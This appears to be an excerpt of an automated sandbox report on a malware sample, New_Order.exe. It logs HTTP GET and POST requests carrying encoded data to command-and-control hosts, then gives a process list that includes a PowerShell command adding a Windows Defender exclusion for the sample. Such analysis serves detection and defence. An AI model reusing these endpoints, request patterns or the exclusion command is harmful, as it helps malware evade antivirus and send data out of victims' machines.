                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:27:43.947745085 CET457OUTGET /fdo5/?540H2x=xa2waNrdOCjpAmfef8jorByukH+EVFd5YbvOdmGsq1/UoTy2yLdiy8uLwcrb3pQUM2TyiZx+d9zg30LTCTeZqohwWyqWM8Qwrg==&fXUX=ShJ8DFcXvtj84pw HTTP/1.1
                                                                                              Host: www.poria.link
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:28:15.077565908 CET806INHTTP/1.1 522
                                                                                              Date: Sun, 03 Dec 2023 15:28:14 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 15
                                                                                              Connection: close
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gF28OXec0uz5xY%2BY8aGIzCd10nhOgWxIMhZPwTgCnAl5L83bw47cAAerrsYKVTgtvFAeDhJy%2BoFvtS9yz0oUTqldH1biOuDqJSTOvELLd8Xs6BVePvLW6wiTnF71siJYiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Referrer-Policy: same-origin
                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 82fcd5dbf8e58260-IAD
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                              Data Ascii: error code: 522


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.449765202.172.28.202802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:28:20.956779003 CET727OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.kasegitai.tokyo
                                                                                              Referer: http://www.kasegitai.tokyo/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 4a 53 59 7a 45 66 50 51 4f 56 35 32 52 77 64 36 59 65 67 55 56 38 71 39 45 6d 37 6e 49 73 49 55 77 59 41 30 74 66 46 68 62 34 44 31 71 6c 4c 48 42 75 41 69 7a 32 49 4f 32 4a 2b 78 53 42 30 32 79 4a 55 51 63 48 32 47 4b 6e 68 4e 33 74 51 70 52 34 44 48 6e 34 62 4d 6c 4e 57 2b 68 4f 49 62 30 49 39 49 4a 74 58 6c 52 69 2b 4f 6f 44 30 41 55 37 66 74 74 61 52 35 43 4e 6d 79 35 48 56 47 47 53 69 64 42 2f 33 4e 4e 2f 69 34 48 6d 32 42 64 71 6b 74 74 50 71 52 59 36 65 35 39 6f 48 45 62 74 54 70 34 70 6d 35 51 79 55 6d 67 41 4b 7a 6d 67 3d 3d
                                                                                              Data Ascii: 540H2x=JSYzEfPQOV52Rwd6YegUV8q9Em7nIsIUwYA0tfFhb4D1qlLHBuAiz2IO2J+xSB02yJUQcH2GKnhN3tQpR4DHn4bMlNW+hOIb0I9IJtXlRi+OoD0AU7fttaR5CNmy5HVGGSidB/3NN/i4Hm2BdqkttPqRY6e59oHEbtTp4pm5QyUmgAKzmg==
                                                                                              Dec 3, 2023 16:28:21.231065989 CET414INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:21 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.449766202.172.28.202802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:28:23.734517097 CET747OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.kasegitai.tokyo
                                                                                              Referer: http://www.kasegitai.tokyo/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 4a 53 59 7a 45 66 50 51 4f 56 35 32 51 54 46 36 5a 39 49 55 54 63 71 36 4f 47 37 6e 48 4d 4a 38 77 59 4d 30 74 65 52 78 62 75 54 31 74 41 50 48 47 64 59 69 30 32 49 4f 2b 70 2b 30 50 78 30 39 79 4a 6f 59 63 48 36 47 4b 6a 4a 4e 33 6f 55 70 52 4a 44 49 32 34 62 4b 74 74 57 38 6c 4f 49 62 30 49 39 49 4a 74 43 41 52 69 57 4f 6f 79 45 41 57 5a 37 75 72 71 52 2b 4c 74 6d 79 7a 6e 56 43 47 53 6a 49 42 36 76 7a 4e 39 61 34 48 6e 47 42 63 2f 51 73 6e 50 71 58 46 4b 66 47 39 6f 57 65 4f 63 2f 6b 70 70 71 6f 53 6b 35 6f 73 31 6d 67 68 53 4c 68 47 6f 55 4c 4b 54 6f 6c 30 4d 42 6e 6b 64 44 6f 6c 49 59 3d
                                                                                              Data Ascii: 540H2x=JSYzEfPQOV52QTF6Z9IUTcq6OG7nHMJ8wYM0teRxbuT1tAPHGdYi02IO+p+0Px09yJoYcH6GKjJN3oUpRJDI24bKttW8lOIb0I9IJtCARiWOoyEAWZ7urqR+LtmyznVCGSjIB6vzN9a4HnGBc/QsnPqXFKfG9oWeOc/kppqoSk5os1mghSLhGoULKTol0MBnkdDolIY=
                                                                                              Dec 3, 2023 16:28:23.993860006 CET414INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:23 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.449767202.172.28.202802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:28:26.515870094 CET10829OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.kasegitai.tokyo
                                                                                              Referer: http://www.kasegitai.tokyo/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 10287
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 4a 53 59 7a 45 66 50 51 4f 56 35 32 51 54 46 36 5a 39 49 55 54 63 71 36 4f 47 37 6e 48 4d 4a 38 77 59 4d 30 74 65 52 78 62 75 62 31 74 79 48 48 42 4d 59 69 31 32 49 4f 77 4a 2b 31 50 78 30 6b 79 4a 41 63 63 47 48 39 4b 68 78 4e 6d 36 63 70 41 4b 62 49 76 6f 62 4b 68 4e 57 2f 68 4f 49 53 30 49 74 45 4a 74 53 41 52 69 57 4f 6f 78 63 41 52 4c 66 75 70 71 52 35 43 4e 6d 75 35 48 56 36 47 53 37 59 42 37 61 47 4b 4e 36 34 47 48 57 42 65 4e 49 73 76 50 71 56 47 4b 66 65 39 6f 62 41 4f 63 69 56 70 70 75 4f 53 6d 6c 6f 73 30 6a 30 35 57 62 2b 51 37 63 35 61 57 49 63 30 74 6b 72 30 73 58 30 6d 2f 6c 59 4f 4c 6b 48 4e 77 69 30 4b 56 70 6b 61 6b 6a 50 55 31 65 57 55 75 66 68 51 6f 65 47 50 55 61 31 46 6f 54 30 78 6e 6b 53 49 6b 2b 66 47 6f 57 59 6a 52 6f 68 2f 6d 69 30 38 6c 56 79 7a 36 38 6e 51 45 77 35 76 73 50 6e 63 55 54 67 32 72 38 7a 58 53 32 56 4d 35 6b 61 55 51 78 76 45 2b 75 6c 6b 4c 7a 78 6d 35 5a 53 30 34 69 42 75 4a 4c 34 4b 6d 4d 55 49 36 51 37 68 77 4c 6c 67 41 50 69 44 77 6f 4b 54 4c 2b 56 4f 4c 4a 63 72 39 65 59 73 34 74 63 6b 6b 64 70 6c 46 64 45 70 76 63 63 58 47 6d 79 44 64 61 30 65 70 43 4e 43 76 71 69 57 56 48 33 63 52 36 42 4b 4c 58 2f 4c 6b 65 55 76 6f 69 61 62 39 48 45 73 51 49 35 7a 70 6d 41 42 31 72 4f 42 46 34 42 51 75 49 61 5a 58 78 2b 66 55 45 44 7a 72 63 35 6a 37 75 63 49 54 62 63 33 6c 68 2f 72 71 31 51 58 43 4e 37 47 68 52 42 32 54 71 73 5a 4b 57 4a 55 38 2b 5a 69 2b 58 4c 67 57 53 61 30 2b 38 67 76 4e 44 48 59 2f 72 4f 70 54 70 38 54 55 41 7a 6f 5a 36 36 78 4f 43 4b 72 4d 59 32 69 36 65 6b 6a 61 6f 44 48 41 6b 43 43 38 65 69 65 49 74 39 55 36 4f 56 68 70 58 54 67 67 64 75 37 64 57 31 63 47 77 43 41 43 6e 4c 69 71 58 46 52 30 30 6a 32 56 2f 6f 79 57 76 62 75 39 65 68 57 4b 42 72 36 5a 35 69 41 70 76 52 56 76 45 32 61 6e 33 53 53 68 53 4b 78 77 50 35 6b 77 79 56 55 71 4e 65 49 68 53 73 4a 2f 68 69 48 77 53 66 71 36 4e 68 37 38 2b 38 5a 2b 55 75 62 5a 39 45 2b 55 30 52 67 53 37 48 30 6c 4c 32 33 46 54 33 73 74 77 32 67 7a 44 5a 2b 79 33 41 50 53 44 78 63 6a 78 48 74 57 43 66 58 38 69 73 72 36 76 6f 54 4a 61 66 4d 44 48 78 33 33 51 79 58 6d 4a 30 34 4a 63 55 6b 69 67 71 6f 46 6c 4b 4d 62 73 44 74 43 33 43 6e 61 6a 56 31 31 75 6f 62 77 4b 57 4b 66 45 75 71 69 35 48 76 74 79 67 50 5a 68 2b 4a 35 71 6b 7a 79 4b 6c 56 37 31 45 49 54 38 68 43 36 71 68 31 68 72 42 57 6b 38 7a 38 37 53 6f 77 36 6e 4e 48 68 66 56 70 78 37 62 4f 72 50 39 64 66 50 66 45 32 69 56 74 30 51 30 68 44 46 63 46 37 6f 2b 48 37 4c 78 4c 6c 51 5a 4d 78 74 38 57 43 61 67 34 70 70 66 6d 43 52 77 64 42 5a 4c 35 71 72 6b 2f 76 62 78 54 64 54 78 74 36 51 75 38 34 53 55 51 67 6a 4c 45 6b 4b 6c 33 6b 75 57 6d 6c 6d 6e 4e 62 69 48 42 59 4d 69 6e 57 6b 7a 34 70 31 4d 52 30 2f 4e 56 2b 43 68 63 70 43 39 4f 37 4d 4c 78 47 43 6f 76 62 4b 2f 31 6a 30 33 2b 53 48 37 4f 74 4d 70 7a 44 31 66 4a 6d 6b 77 69 45 39 4c 44 43 6c 38 77 73 67 66 42 32 5a 67 59 34 4a 37 4d 64 39 35 71 73 71 7a 74 4a 34 61 70 67 69 4b 30 61 63 4a 4e 4a 37 34 65 43 79 49 79 33 55 4b 49 50 65 48 74 67 67 44 38 52 4b 69 45 76 45 6c 72 54 74 57 31 31 70 52 69 35 6e 68 4a 43 46 41 31 39 43 47 31 44 77 70 30 35 4c 4a 32 52 6b 41 76 79 35 6a 61 39 68 6f 76 47 36 34 48 59 74 62 6f 52 47 63 47 7a 6d 37 76 4a 6f 42 55 58 4c 37 2b 31 62 65 77 45 58 6a 4e 2b 47 39 46 57 73 77 6f 2f 52 4d 76 6c 31 58 4b 6a 69 31 65 75 4a 6b 73 2b 64 2b 36 49 54 42 32 6f 72 64 37 72 2b 47 71 55 4d 4a 52 49 66 69 2b 78 41 4c 46 36 70 6b 2f 77 53 38 45 44 59 48 36 51 37 32 59 51 4c 42 35 45 74 70 2f 7a 51 38 59 31 74 64 61 75 63 44 50 6b 58 57 43 35 6b 38 6b 7a 4b 59 41 32 65 31 78 53 50 74 63 4d 72 62 48 31 4e 58 42 54 70 65 7a 74 6f 4a 4f 5a 56 37 7a 61 4a 49 65 37 6f 6a 7a 41 79 79 4b 74 6b 51 47 33 42 6a 68 75 38 76 69 5a 76 62 33 41 71 75 4d 46 53 38 4c 32 47 4d 41 37 36 76 72 48 57 51 2f 42 71 44 70 38 4c 6e 35 47 37 74 4c 2b 32 4d 46 41 75 57 73 5a 79 72 52 33 78 5a 6c 4e 46 43 36 6f 68 42 45 58 38 58 77 4a 44 52 35 31 70 55 70 6e 66 49 54 51 34 52 78 4e 54 6b 2b 39 59 6d 6d 4d 54 71 39 44 4d 42 77 50 6a 49 32 68 34 4e 42 30 43 4b 46 76 2b 4f 41 52 72 4d 2f 68 79 57 38 6f 65 4b
                                                                                              Data Ascii: 540H2x=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
                                                                                              Dec 3, 2023 16:28:27.006155968 CET414INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:26 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.449768202.172.28.202802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:28:29.296840906 CET462OUTGET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EQwTHp3RZGFUPSUcH+83d++sEHXiHecksK53+uRoarOYzym5WINU/nAp376IAi0Fnc8MDGSrPwcAz9k7VILN2J3NqNX7kas5xg== HTTP/1.1
                                                                                              Host: www.kasegitai.tokyo
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:28:29.556153059 CET414INHTTP/1.1 404 Not Found
                                                                                              Date: Sun, 03 Dec 2023 15:28:29 GMT
                                                                                              Server: Apache
                                                                                              Content-Length: 196
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:16:25:15
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Users\user\Desktop\New_Order.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x6e0000
                                                                                              File size:764'416 bytes
                                                                                              MD5 hash:E63F894AE694122FE230D5A91250BC1F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:16:25:17
                                                                                              Start date:03/12/2023
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe
                                                                                              Imagebase:0x6e0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
